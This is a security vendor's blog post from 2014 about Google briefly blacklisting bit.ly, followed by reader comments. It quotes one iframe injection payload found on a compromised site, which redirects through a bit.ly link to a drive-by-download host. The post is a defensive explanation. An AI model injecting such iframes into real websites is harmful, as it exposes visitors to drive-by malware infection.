• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Google Blacklists Bit.ly

October 25, 2014Daniel Cid

35
SHARES
FacebookTwitterSubscribe

If you ever shortened a URL using bit.ly or if you use it anywhere, be aware that Google recently blacklisted all bit.ly pages through its Safe Browsing program. It means that anyone using Chrome, Firefox or Safari will get a nasty The site ahead contains malware warning when visiting a bit.ly link:

Screen Shot 2014-10-25 at 10.23.45 AM

Why would Google blacklist bit.ly?

Google has many automated processes to detect if a specific domain is hosting malware, redirecting to malware or somehow being misused to compromise other sites (as an intermediary). It flags thousands of sites every day and it seems that the bit.ly had some redirections that were flagged by their detection process.

This is what their diagnostics page say:

What is the current listing status for bit.ly? Site is listed as suspicious – visiting this web site may harm your computer.

Of the 91549 pages we tested on the site over the past 90 days, 721 page(s) resulted in malicious software being downloaded and installed without user consent.

That generally means that someone shortened a URL that was redirecting to a browser exploit kit that was pushing malware to the visitors visiting this page.

Shortened URL malware

Unfortunately, Google is not completely wrong with this one (but likely a bit excessive, time will tell). We constantly see malware injection on websites leveraging shortened URL links. Here is an example of what we mean, this payload was found in a compromised website:

<iframe src="http://bit.ly/1qJGlE0"nbsp;
name="iframe_name" scrolling="no" frameborder="0" allowfullscreen align="top" height="400px" width="720px">

This iframe injection has a bit.ly link that redirects to a drive-by-download hosted at httx://teamliboza[.]nl/streamplayer1.php. It happens often with bit.ly and other URL shortens. This new blacklisting status could be a change in tide for URL shorteners as Google takes a hard stance against how attackers employ them to distribute malware. That or they could be legitimately blocked, it’s just hard to say at the moment.

Whether they are actually hacked or being tagged for what others are doing will require more time and analysis as it’s a very unique situation. For now however, if you depend on the shortening service, if you want people to see your content it’s best to avoid the service until the issue has been resolved.

Additionally, if you leverage the shortener in your own website this could be impactful to you as your website could get inadvertently blacklisted for loading a blacklisted website. Something to be mindful of. The good news is that the blacklist will be for the shortener, so removing it will address the problem, but the bad news is that most end-users won’t read the details and assume it’s you.

We will keep monitoring this issue closely and we will post an update as soon as we hear more. In the mean time, do not visit bit.ly links and replace them with their real final destination URL.

Update 1: After almost 12 hours, Google removed the ban from Bit.ly. They also changed the diagnostics page to:

What is the current listing status for bit.ly?
This site is not currently listed as suspicious.

35
SHARES
FacebookTwitterSubscribe

Categories: Website SecurityTags: Google, URL Shorteners, Website Blacklist

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Rollins D C Orlu

    October 25, 2014

    Interesting. I’ve been wondering when (if) this would ever happen. I’m even more curious to know what would happen if Google’s own URL shortner goo.gl was involved.

  2. BobWP

    October 25, 2014

    Thanks for the heads up. I use Bit.ly with a custom domain and have it set up in Tweetdeck and on my site via the WooThemes plugin WooDojo Shortlinks. I assume I should turn these off until further notice …. thanks!

  3. Missy

    October 25, 2014

    Google’s own feedburner shortened links are also being flagged (http://goo.gl/fb) any link from feedburner will show the same message. http://www.google.com/safebrowsing/diagnostic?site=goo.gl/fb

  4. Rachel Ramey

    October 25, 2014

    Do you know if the same warning will apply for sites using their own URL’s through bit.ly? I’ve purchased a domain name for this purpose but haven’t set it up yet; I’m wondering if this might be a good time to do that!

  5. hopeforcaregivers

    October 25, 2014

    This is SUCH a P.I.T.A.! I have Biy.ly links ALL over my site and now the Grand-Goog’ has decided that a legitimate service is malicious and my connected relationship my site could be malicious ?!?! AHH!

    I get it that google is looking for problems and HOPEFULLY Bit.ly will sort out the Issues ASAP. One or two bad apples can really spoil the entire truckload of GOOD ones.

    How do you feel this will shake out?
    Do we need to move to another URL shortening service to avoid this mess?
    Do you feel that Bit.ly “could” fix the issue and return all GOOD sites back to “safe” status?

    Thank you for all your vigilant work, PLEASE keep this issue updated on your blog, I for one am tracking this with A-1 priority! 😀

    Thank You

  6. Chris Lang

    October 25, 2014

    Many are saying this is cleared now. Got an update?

    • Sharon

      October 25, 2014

      They say they’ve resolved it, but my Facebook post I have an ad on, is not 🙁

      • Chris Lang

        October 25, 2014

        Is it a bitly link?

  7. Don Harrison

    October 25, 2014

    I just logged on a few minutes ago and it seems fine

    • Sharon

      October 25, 2014

      All my redirects on Facebook are not working, twitter is okay, but all the ones on my work page, are still being flagged

  8. Sharon

    October 25, 2014

    THIS sucks, 3 years of links screwed because Google is stupid. Great

  9. Marcelo Pedra

    October 25, 2014

    I’d wish Matt Cutts come here and answer that 🙂 I bet they would receive an alert before goo.gl were about to be blocked, to create exceptions and do not block theirselves, or maybe not? 😀

  10. duckwho

    October 26, 2014

    They have sandboxed themselves 4 or 5 years ago. Was for an seo no-no of some sort.

    • Orun Bhuiyan

      October 27, 2014

      They penalized themselves multiple times. Most notably the time a few years ago when Google Japan tried to get Japanese bloggers to create Google-centric content and try to push past Yahoo! Japan in market share.

  11. Chris Finnegan

    October 27, 2014

    I see the same with del.icio.us now “Attackers currently on del.icio.us might attempt to install dangerous programmes…”

  12. Hornsby Bookkeeping

    October 27, 2014

    Great to see that google has changed their mind. Disproportionate response much.

  13. Ābdúllāh Rāźāq

    October 1, 2015

    Baldness can be cured using Headpower Scalp micropigmentation

  14. Tamra Chaney

    November 21, 2017

    I’d like to know a way to banish this company from using, sharing, or selling my email address before I turn them in to the FCC. I’m sick of getting 2-300 spam EMAILS a day!!! Really pisses me off!!! If Google is allowing tell me!! I’ll deal with them first……

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.